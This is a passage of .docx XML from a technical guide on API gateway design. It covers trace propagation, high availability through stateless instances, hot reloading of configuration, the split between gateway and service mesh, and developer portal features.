      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  Gateway → Backend (propagates trace context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C54275" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    Backend span (child of gateway span): {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5893371A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      trace_id: "4bf92f3577b34da6a3ce929d0e0e4736",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5CDEB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      parent_span_id: "00f067aa0ba902b7",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9724F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      span_id: "a2fb4a1d1a96d312",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693148C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      start: T0+3ms,   (after auth+rate limit processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387FC26" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      end: T0+150ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E12DF9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD8013" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The trace shows: gateway processing (0–3ms), backend processing (3–150ms), gateway response processing (150–152ms). Each phase is separately attributable — debugging latency is immediate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221731D8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="5CA24A06">
          <v:rect id="_x0000_i3832" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFF63F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Gateway High Availability — Eliminating the Single Point of Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6B35E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The API gateway processes all API traffic — it is inherently a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>critical single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>. Making it highly available is an existential requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334BE6F4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Horizontal Scaling with Stateless Gateway Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7F543" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The fundamental HA approach: </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple gateway instances, no shared state</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8BDEB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stateless requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AAB27" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Rate limit state in Redis (not local to gateway instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D64CC4A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Session/authentication cache in Redis (not local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDF38C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Route configuration from a control plane or config store (not static files on the gateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F751255" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Upstream connection pools are per-instance but recoverable — a new instance builds its pool quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D23DE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>With stateless design, any gateway instance can handle any request. A load balancer (or Anycast routing for global deployments) distributes traffic across instances. Instance failure → load balancer removes it → traffic redistributes to surviving instances automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65BF15" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The load balancer in front of the API gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6074C0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BC7B5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Internet traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D9626A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1596B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[L4 Load Balancer / Anycast]  (extremely fast, minimal processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF040B4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF0344" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[API Gateway cluster]         (N stateless instances)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D4BA7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402C1A90" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[Backend services]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703D86E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The L4 load balancer is itself distributed/redundant (see Load Balancing section). The API gateway cluster is N identical stateless instances. Backend services are their own redundant clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992F728" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration Propagation and Hot Reloading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4620BBD5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Configuration changes (new routes, updated auth policies, changed rate limits) must propagate to all gateway instances </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without restarting any instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> (restart = dropped connections = brief outage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2AF58" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot reloading mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9DC26C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SIGHUP-based reload (Nginx):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Sending SIGHUP to Nginx causes it to re-read configuration files and </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gracefully restart workers</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — new workers start with new configuration, old workers finish their current requests and exit. Zero-downtime reload. But requires a config file update + signal delivery mechanism — complex in distributed environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08388207" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xDS streaming (Envoy):</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Configuration is pushed via gRPC streams from the control plane. No restart, no signal — updates are applied to the running process's in-memory state. The fastest, cleanest hot-reload mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE10362" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Configuration polling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Gateway periodically polls a configuration store (etcd, Consul, a REST API) for changes. Applies changes immediately upon detection. Simple but introduces propagation delay equal to the poll interval. Suitable for environments where sub-second propagation isn't required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BB353" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The configuration consistency problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B4035" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>With N gateway instances polling a configuration store, all instances see the configuration update within one poll interval — but not simultaneously. During the propagation window, some instances have the new configuration and some have the old. For route changes, this means some requests go to the new backend and some to the old — usually acceptable (clients retry). For authentication configuration changes (adding/removing allowed algorithms, rotating JWKS URLs), inconsistency during the propagation window could cause some requests to be incorrectly accepted or rejected. Minimize this window by using push-based configuration (xDS) rather than polling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B0EE9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="58FEA876">
          <v:rect id="_x0000_i3833" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8802CB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. API Gateway vs Service Mesh — The Architectural Division</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E01324" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>A common architectural confusion is the boundary between API gateway and service mesh. They overlap in capabilities (both do routing, load balancing, observability, traffic management) but have different </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scope and positioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B2D68" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Clean Architectural Division</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19ED1D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Gateway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> North-South traffic — traffic entering the cluster from external clients (internet → cluster). Handles external-facing concerns: external authentication (JWT from client apps), external rate limiting (per-client quotas), external API versioning, developer-facing documentation and key management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA2E99" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Mesh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> East-West traffic — traffic between services within the cluster (service → service). Handles internal-facing concerns: service-to-service mTLS (mutual authentication between services), internal load balancing (which instance of a service handles each request), internal circuit breaking, internal observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAA535" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30C562" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>External Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11266E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC1E1B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[API Gateway]  ← North-South boundary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441BCAF9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">   ↓       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79469223" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[Service A] [Service B]  ← East-West (service mesh handles this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23614732" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">   ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F51404" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>[Service C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DC8E7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where They Overlap and Why</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E10B86" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Both do load balancing (gateway: client→service, mesh: service→service). Both do circuit breaking. Both do observability. Both do retries. The overlap is intentional — they operate at different scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29840A11" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The feature duplication problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498307B7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Circuit breaking at both the API gateway (gateway→service A) and service mesh (service A→service B) creates redundant protection. If service B fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBD3A4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="866"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Service mesh's circuit breaker opens (service A stops calling service B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20832474" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="866"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Service A returns an error to the gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621A42DE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="866"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Gateway's circuit breaker may also open (gateway stops calling service A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484187D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>This double circuit breaking can cause over-aggressive traffic reduction — service A is healthy but the gateway stops sending it traffic because it's returning errors (caused by service B's circuit breaker). The gateway's circuit breaker should be configured to distinguish between service A errors and service A-returning-errors-because-of-service-B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC4514" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The emerging convergence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE31005" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Modern architectures are converging toward </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a unified control plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> that configures both the API gateway (external-facing) and the service mesh (internal-facing) with the same primitives. Istio's VirtualService and DestinationRule apply to both. This simplifies operations — one system to configure, one mental model for traffic management across both external and internal boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA5E1E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="3C91A05E">
          <v:rect id="_x0000_i3834" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29779F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Developer Experience — The External-Facing API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDED69D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Developer Portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC4CA7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>An API gateway for external consumers (public APIs, partner integrations) requires a </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>developer portal</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — the external-facing interface for API consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66759A2D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Self-service API key provisioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Developers register, create applications, generate API keys — without any manual approval process. The gateway's management API automatically provisions the keys and applies configured quotas. The developer can immediately start using the API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A8A5AF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interactive API documentation (OpenAPI/Swagger):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E915A7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway exposes API specifications (OpenAPI 3.0) and renders them as interactive documentation. Developers can test API calls directly from the documentation browser — the portal constructs the HTTP request, includes the developer's API key, and shows the real response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F04A6F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API specification synchronization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The gateway can automatically pull OpenAPI specs from backend services (via a management endpoint or CI/CD integration) and expose them in the portal. When a backend developer updates the spec (new endpoints, changed parameters), the portal documentation updates automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6468F4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage analytics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The portal shows developers their API usage: requests per day, error rates, latency, which endpoints they hit most. This enables self-service debugging — a developer can see their rate limit consumption and error patterns without contacting support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201B3062" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Webhook management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> For APIs with event-driven capabilities, the portal manages webhook registrations — developers register URLs to receive events, and the portal handles delivery, retry logic, and delivery status reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BEDFA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API Monetization at the Gateway Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20856983" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>For commercial APIs, the gateway enforces billing-related controls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D8A53" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
